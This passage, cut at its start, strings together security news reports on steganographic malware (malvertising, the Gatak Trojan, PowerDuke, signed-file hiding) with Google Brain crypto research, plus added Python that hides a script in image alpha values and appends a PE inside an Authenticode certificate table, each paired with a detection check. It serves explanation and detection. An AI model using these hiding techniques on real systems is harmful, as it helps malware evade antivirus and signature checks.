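        tens = FULL_ALPHA - alphas[LEN_DIGITS + 2 * i]
        ones = FULL_ALPHA - alphas[LEN_DIGITS + 2 * i + 1]
        chars.append(chr(OFFSET + 10 * tens + ones))
    return "".join(chars)


def near_opaque_pixels(rgba: bytes) -> int:
    """Detection check: count pixels whose alpha is 246..254. An ordinary opaque banner
    has none; a banner carrying this encoding has one for every non-zero digit."""
    return sum(1 for a in rgba[3::4] if FULL_ALPHA - 9 <= a < FULL_ALPHA)


def make_banner(width: int = 160, height: int = 600) -> bytes:
    """A constructed, fully opaque RGBA gradient standing in for a 160x600 ad image."""
    buf = bytearray()
    for y in range(height):
        for x in range(width):
            buf += bytes((x % 256, y % 256, (x + y) % 256, FULL_ALPHA))
    return bytes(buf)


if __name__ == "__main__":
    banner = make_banner()
    stego = hide_script(banner, SAMPLE_SCRIPT)
    print("round trip ok:", recover_script(stego) == SAMPLE_SCRIPT)
    print("near-opaque pixels, clean vs stego:", near_opaque_pixels(banner), near_opaque_pixels(stego))
```

The colour bytes are never touched and each alpha moves by at most 9 out of 255, which is why the rendered banner looks unchanged; the same property is what makes a histogram of alpha values such an effective tell.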

There's no reason future campaigns—or possibly ongoing ones that have yet to be discovered—couldn't exploit zero-day vulnerabilities that infected a much larger base of people. Until ad networks get much better at detecting malvertising campaigns, the scourge is likely to continue.
Software nasty also uses steganography to inject poison payload A Trojan targeting US healthcare organizations attempts to avoid detection by going to sleep for prolonged periods after initial infection, security researchers warn. Symantec estimates that thousands of organizations have been hit by the Gatak Trojan since 2012.

The malware is programmed to spread aggressively across an organization’s network once it gets a foothold. The healthcare sector in particular has been disproportionately targeted – of the top 20 most affected organizations with the highest number of infected computers, 40 per cent were in the healthcare sector, Symantec reports. Selling healthcare records is a growing trade on cybercrime forums.

This could explain the attackers’ heavy focus on the healthcare sector. Gatak reels in victims through websites promising product licensing keys for pirated enterprise software packages (backup, 3D scanning software, etc).

These supposed software license key generators (keygens) actually come packed with malicious code. The software nasty also spreads, to a lesser extent, via watering-hole attacks, in which the attacker infects websites that members of the targeted group are known to visit. The malware creates a backdoor on compromised machines before stealing information. The attackers are known to use an infected machine as a foothold from which to break into other machines on the same or associated networks, probably by exploiting weak passwords and poorly secured file shares and network drives. “In some cases, the attackers have infected computers with other malware, including various ransomware variants and the Shylock financial Trojan,” Symantec reports. “In the case of Shylock, these appear to be older versions of the threat and might even be 'false flag' infections. “They may be used by the group when they believe their attack has been uncovered, in order to throw investigators off the scent,” it adds. The malware downloads instructions from pre-programmed URLs.

These instructions are smuggled past network defenses using steganography, a technique for hiding data within seemingly innocuous (usually image) files.
As Trump was giving his victory speech, a new wave of spear phishing attacks from Russian hackers was already on its way using his win as click-bait.

Less than six hours after Donald Trump won the US presidential election, a new spear phishing campaign was launched by a Russia-based group. The group is apparently one of the two organizations connected to the breach at the Democratic National Committee, and it's responsible for nearly a decade of intelligence collection campaigns against military and diplomatic targets. Security firm Volexity refers to the group as "the Dukes," after the malware family it uses; according to a report by Volexity founder Steven Adair, the group is also referred to as APT29 or "Cozy Bear." The Dukes' primary targets in this latest round of attacks appear to be non-governmental organizations (NGOs) and policy think tanks in the US. According to Volexity's data, the threat group sent e-mails from purpose-built Gmail accounts and from what may be a compromised e-mail account at Harvard University's Faculty of Arts and Science.

The phishing e-mails dropped a new variant of backdoor malware dubbed "PowerDuke" by Volexity, and this malware gave attackers remote access to compromised systems. Volexity has been tracking a number of campaigns based on PowerDuke since August, when some "highly targeted" malicious e-mails were sent to individuals at a number of policy research organizations in the US and Europe. The e-mails were disguised as messages from the Center for a New American Security (CNAS), Transparency International, the Council on Foreign Relations, the International Institute for Strategic Studies (IISS), and Eurasia Group. Another wave of similar e-mails targeted universities in October.
The latest round of e-mails, sent out on November 8 and 9, "were sent in large quantities to different individuals across many organizations and individuals focusing in national security, defense, international affairs, public policy, and European and Asian studies," Adair wrote. "Two of the attacks purported to be messages forwarded on from the Clinton Foundation giving insight and perhaps a postmortem analysis into the elections. Two of the other attacks purported to be eFax links or documents pertaining to the election’s outcome being revised or rigged. The last attack claimed to be a link to a PDF download on 'Why American Elections Are Flawed.'"

Figure: a sample of one of the malicious "eFax" messages carrying PowerDuke.

PowerDuke uses steganography to conceal its backdoor's code in a .PNG graphic file. The August attacks used legitimate content from the spoofed senders in Word and Excel documents to fool targets into opening attachments outside of a safe preview mode; scripts then downloaded the .PNG from a compromised Web server. The malware was next extracted from the .PNG and executed via Windows' rundll32.exe, residing only in memory and leaving no trace on disk. Once installed, the backdoor contacts a command and control network and allows the attackers to carry out a large range of commands, including the uploading and downloading of files, remote wiping of files, and accessing details about the infected machine, its user, and the network it runs on.

This week's attacks used a combination of approaches to deliver PowerDuke. The e-mails had either malicious links to .ZIP files or forged Windows shortcut files linked to a "clean" Rich Text Format document and a PowerShell script that installed the malware. Two were "eFax" messages; the other three apparently came from the e-mail account of a senior research fellow at Harvard's Center for International Development.
Two of those messages were spoofed forwards of messages from the Clinton Foundation using the same Harvard account. In all cases, the malware scripts included a variety of advanced anti-malware detection and virtual machine detection scripts to evade analysis. "The group’s anti-VM macros and PowerShell scripts appear to have drastically reduced the number of sandboxes and bots that the group has to deal with on their command and control infrastructure," Adair noted. "This combined with their use of steganography to hide their backdoor within PNG files that are downloaded remotely and loaded in memory only or via alternate data streams (ADS) is quite novel in its approach. Volexity believes that the Dukes are likely working to gain long-term access into think tanks and NGOs and will continue to launch new attacks for the foreseeable future."
Google Brain has created two artificial intelligences that evolved their own cryptographic algorithm to protect their messages from a third AI, which was trying to evolve its own method to crack the AI-generated crypto. The study was a success: the first two AIs learnt how to communicate securely from scratch.

Figure: the setup of the crypto system. P = input plaintext, K = shared key, C = encrypted text, and PEve and PBob are the computed plaintext outputs.

The Google Brain team (which is based in Mountain View and is separate from DeepMind in London) started with three fairly vanilla neural networks called Alice, Bob, and Eve. Each neural network was given a very specific goal: Alice had to send a secure message to Bob; Bob had to try and decrypt the message; and Eve had to try and eavesdrop on the message and try to decrypt it. Alice and Bob have one advantage over Eve: they start with a shared secret key (i.e. this is symmetric encryption). Importantly, the AIs were not told how to encrypt stuff, or what crypto techniques to use: they were just given a loss function (a failure condition), and then they got on with it. In Eve's case, the loss function was very simple: the distance, measured in correct and incorrect bits, between Alice's original input plaintext and its guess. For Alice and Bob the loss function was a bit more complex: if Bob's guess (again measured in bits) was too far from the original input plaintext, it was a loss; for Alice, if Eve's guesses are better than random guessing, it's a loss. And thus a generative adversarial network (GAN) was created. Alice, Bob, and Eve all shared the same "mix and transform" neural network architecture, but they were initialised independently and had no connection other than Alice and Bob's shared key.
For Alice the key and plaintext are input into the first layer of the neural network; for Bob the key and the ciphertext were input; and for Eve, she got just the ciphertext. The first layer is fully-connected, so the text and key can mix about. Following the first layer there are a number of convolutional layers, which learn to apply a function to the bits that were handed to it by the previous layer. They don't know what that function might be; they just learn as they go along. For Alice, the final layer spits out some ciphertext; Bob and Eve output what they hope is the plaintext.

Figure: Bob and Eve's reconstruction errors during training. Eve starts to improve, but then a change in the Alice-Bob crypto method shuts her out again.

The results were... a mixed bag. Some runs were a complete flop, with Bob never able to reconstruct Alice's messages. Most of the time, Alice and Bob did manage to evolve a system where they could communicate with very few errors. In some tests, Eve showed an improvement over random guessing, but Alice and Bob then usually responded by improving their cryptography technique until Eve had no chance (see graph). The researchers didn't perform an exhaustive analysis of the encryption methods devised by Alice and Bob, but for one specific training run they observed that it was both key- and plaintext-dependent. "However, it is not simply XOR. In particular, the output values are often floating-point values other than 0 and 1," they said. In conclusion, the researchers—Martín Abadi and David G. Andersen—said that neural networks can indeed learn to protect their communications, just by telling Alice to value secrecy above all else—and importantly, that secrecy can be obtained without prescribing a certain set of cryptographic algorithms.
There is more to cryptography than just symmetric encryption of data, though, and the researchers said that future work might look at steganography (concealing data within other media) and asymmetric (public-key) encryption. On whether Eve might ever become a decent adversary, the researchers said: "While it seems improbable that neural networks would become great at cryptanalysis, they may be quite effective in making sense of metadata and in traffic analysis." You can read the researchers' preprint paper on arXiv. This post originated on Ars Technica UK
A new technique allows attackers to hide malicious code inside digitally signed files without breaking their signatures and then to load that code directly into the memory of another process. The attack method, developed by Tom Nipravsky, a researcher with cybersecurity firm Deep Instinct, might prove to be a valuable tool for criminals and espionage groups in the future, allowing them to get malware past antivirus scanners and other security products. The first part of Nipravsky's research, which was presented at the Black Hat security conference in Las Vegas this week, has to do with file steganography -- the practice of hiding data inside a legitimate file. While malware authors have hidden malicious code or malware configuration data inside pictures in the past, Nipravsky's technique stands out because it allows them to do the same thing with digitally signed files.

That's significant because the whole point of digitally signing a file is to guarantee that it comes from a particular developer and hasn't been altered en route. When an executable is signed, the signature data is stored in a region of the file called the attribute certificate table (ACT), which the optional header's Certificate Table data directory points to, and that region is excluded when calculating the file's Authenticode hash, a unique string that serves as a cryptographic representation of its contents. This makes sense because the certificate information is not part of the original file at the time when it is signed.
It's only added later to certify that the file is configured as intended by its creator and has a certain hash. However, this means that attackers can add data, including another complete file, inside the ACT without changing the file hash and breaking the signature. Such an addition changes the overall size of the file on disk, and Microsoft's Authenticode technology compares that size against size values recorded in the file's headers when validating a signature. However, the file size is recorded in three different places inside the header, and two of those values can be modified by an attacker without breaking the signature.

The problem is that Authenticode checks those two modifiable file size entries and doesn't check the third one. According to Nipravsky, this is a design logic flaw in Authenticode. Had the technology checked the third, unmodifiable file size value, attackers wouldn't be able to pull off this trick and still keep the file signature valid, he said. The malicious data added to the ACT is not loaded into memory when the modified file itself is executed, because the certificate table is not part of any section that the Windows loader maps. However, the ACT can serve as a hiding place to pass a malicious file undetected past antivirus defenses. For example, attackers could add their malicious code to one of the many Microsoft-signed Windows system files or to a Microsoft Office file.

Their signatures would still be valid and the files functional. Moreover, most security applications whitelist these files because they're signed by trusted publisher Microsoft to avoid false positive detections that could delete critical files and crash the system. The second part of Nipravsky's research was to develop a stealthy way to load the malicious executable files hidden inside signed files without being detected. He reverse engineered the whole behind-the-curtain process that Windows performs when loading PE files to memory.

This procedure is not publicly documented because developers don't typically need to do this themselves; they rely on the OS for file execution. It took four months of eight-hours-per-day work, but Nipravsky's reverse engineering efforts allowed him to create a so-called reflective PE loader: an application that can load portable executables directly into the system memory without leaving any traces on disk.

Because the loader uses the exact process that Windows does, it's difficult for security solutions to detect its behavior as suspicious. Nipravsky's loader can be used as part of a stealthy attack chain, where a drive-by download exploit executes a malware dropper in memory.

The process then downloads a digitally signed file with malicious code in its ACT from a server and then loads that code directly into memory. The researcher has no intention of releasing his loader publicly because of its potential for abuse. However, skilled hackers could create their own loader if they're willing to put in the same effort. The researcher tested his reflective PE loader against antivirus products and managed to execute malware those products would have otherwise detected. In a demo, he took a ransomware program that one antivirus product normally detected and blocked, added it to the ACT of a digitally signed file, and executed it with the reflective PE loader. The antivirus product only detected the ransom text file created by the ransomware program after it had already encrypted all of the user's files.
In other words, too late. Even if attackers don't have Nipravsky's reflective PE loader, they can still use the steganography technique to hide malware configuration data inside legitimate files or even to exfiltrate data stolen from organizations.

Data hidden inside a digitally signed file would likely pass network-level traffic inspection systems without problems.
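To show exactly which bytes an Authenticode signature covers, and why data appended to the certificate table slips past it, here is an added example written for this page; it is not Nipravsky's tool and performs no real signing. It builds a tiny PE32+ image in memory, computes the Authenticode hash by the published PE hashing procedure (the CheckSum field, the security directory entry and the certificate table are skipped), appends a second PE inside the certificate table while growing the two length fields that describe it (WIN_CERTIFICATE.dwLength and the security directory Size), and shows that the Authenticode hash is unchanged even though the file itself is. The inner and outer images, the placeholder certificate blob and the "MZ inside the certificate table" detection heuristic are my constructions, and the example does not model the three file-size fields the article mentions.

```python
import hashlib
import struct

FILE_ALIGN = 512


def pe_layout(pe: bytes) -> dict:
    """Offsets Authenticode cares about, read from the headers (PE32 and PE32+ alike)."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    coff = e_lfanew + 4
    n_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    opt = coff + 20
    magic = struct.unpack_from("<H", pe, opt)[0]
    dirs = opt + (112 if magic == 0x20B else 96)        # data directories start (PE32+ / PE32)
    secdir = dirs + 4 * 8                                # entry 4 = IMAGE_DIRECTORY_ENTRY_SECURITY
    cert_off, cert_size = struct.unpack_from("<II", pe, secdir)   # file offset and size of the ACT
    return dict(checksum=opt + 64, secdir=secdir,
                size_of_headers=struct.unpack_from("<I", pe, opt + 60)[0],
                sections=opt + opt_size, n_sections=n_sections,
                cert_off=cert_off, cert_size=cert_size)


def authenticode_hash(pe: bytes) -> str:
    """SHA-256 over the ranges the Authenticode PE hashing procedure covers: the whole
    file except the CheckSum field, the security directory entry and the ACT itself."""
    lay = pe_layout(pe)
    h = hashlib.sha256()
    h.update(pe[:lay["checksum"]])                              # headers up to CheckSum
    h.update(pe[lay["checksum"] + 4:lay["secdir"]])             # ... up to the security directory entry
    h.update(pe[lay["secdir"] + 8:lay["size_of_headers"]])      # ... and the rest of the headers
    hashed = lay["size_of_headers"]
    secs = [struct.unpack_from("<II", pe, lay["sections"] + 40 * i + 16)   # (SizeOfRawData, PointerToRawData)
            for i in range(lay["n_sections"])]
    for raw_size, raw_ptr in sorted(secs, key=lambda s: s[1]):
        h.update(pe[raw_ptr:raw_ptr + raw_size])
        hashed += raw_size
    extra = len(pe) - hashed - lay["cert_size"]                 # trailing data that is not the ACT
    if extra > 0:
        h.update(pe[hashed:hashed + extra])
    return h.hexdigest()


def build_sample_pe(cert_blob: bytes) -> bytes:
    """A minimal PE32+ image (constructed): 512-byte headers, one .text section, then a
    WIN_CERTIFICATE entry wrapping cert_blob. cert_blob stands in for a PKCS#7 signature;
    nothing is really signed here, the point is which bytes the hash covers."""
    body = cert_blob + b"\0" * (-(8 + len(cert_blob)) % 8)     # entries are 8-byte aligned
    cert = struct.pack("<IHH", 8 + len(body), 0x0200, 0x0002) + body   # dwLength, wRevision, wCertificateType
    cert_off = FILE_ALIGN * 2                                   # right after headers + one section
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                       # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x8664, 1, 0, 0, 0, 240, 0x0022)   # AMD64, 1 section, PE32+ opt hdr
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, 0x20B)                       # PE32+ magic
    struct.pack_into("<Q", opt, 24, 0x140000000)                # ImageBase
    struct.pack_into("<II", opt, 32, 0x1000, FILE_ALIGN)        # SectionAlignment, FileAlignment
    struct.pack_into("<III", opt, 56, 0x2000, FILE_ALIGN, 0)    # SizeOfImage, SizeOfHeaders, CheckSum
    struct.pack_into("<I", opt, 108, 16)                        # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 112 + 4 * 8, cert_off, len(cert))   # security directory: offset, size
    sec = struct.pack("<8sIIIIIIHHI", b".text", 0x200, 0x1000, FILE_ALIGN, FILE_ALIGN, 0, 0, 0, 0, 0x60000020)
    headers = (bytes(dos) + b"PE\0\0" + coff + bytes(opt) + sec).ljust(FILE_ALIGN, b"\0")
    text = (b"\xC3" * 16).ljust(FILE_ALIGN, b"\0")             # section body: a few RET instructions
    return headers + text + cert


def hide_in_cert_table(pe: bytes, payload: bytes) -> bytes:
    """The trick as the article describes it: append payload inside the ACT and grow the
    two length fields describing it. Both live in ranges the hash skips. Assumes the ACT
    sits at the end of the file, as it normally does."""
    lay = pe_layout(pe)
    blob = payload + b"\0" * (-len(payload) % 8)
    new_size = lay["cert_size"] + len(blob)
    out = bytearray(pe[:lay["cert_off"] + lay["cert_size"]] + blob)
    struct.pack_into("<I", out, lay["cert_off"], new_size)                  # WIN_CERTIFICATE.dwLength
    struct.pack_into("<II", out, lay["secdir"], lay["cert_off"], new_size)  # security directory Size
    return bytes(out)


def find_pe_in_cert_table(pe: bytes):
    """Detection check (mine): an ACT should hold DER-encoded PKCS#7 only. Look for an MZ
    header whose e_lfanew lands on a PE signature; return its file offset or None."""
    lay = pe_layout(pe)
    table = pe[lay["cert_off"]:lay["cert_off"] + lay["cert_size"]]
    i = table.find(b"MZ", 8)
    while i != -1:
        if i + 0x40 <= len(table):
            lfanew = struct.unpack_from("<I", table, i + 0x3C)[0]
            if table[i + lfanew:i + lfanew + 4] == b"PE\0\0":
                return lay["cert_off"] + i
        i = table.find(b"MZ", i + 1)
    return None


if __name__ == "__main__":
    outer = build_sample_pe(b"\x30\x03\x02\x01\x00")           # placeholder DER, not a real signature
    tampered = hide_in_cert_table(outer, build_sample_pe(b"\x30\x03\x02\x01\x00"))
    print("authenticode hash unchanged:", authenticode_hash(outer) == authenticode_hash(tampered))
    print("embedded PE found at offset:", find_pe_in_cert_table(tampered))
```

A whole-file SHA-256 of the two images differs, which is why a plain file-hash allowlist still catches the modified copy; the Authenticode hash, which is what signature verification actually compares, does not. Note that the hash is only one half of verification: the blob here is not a real PKCS#7 structure, so a real verifier would reject both files for that reason alone.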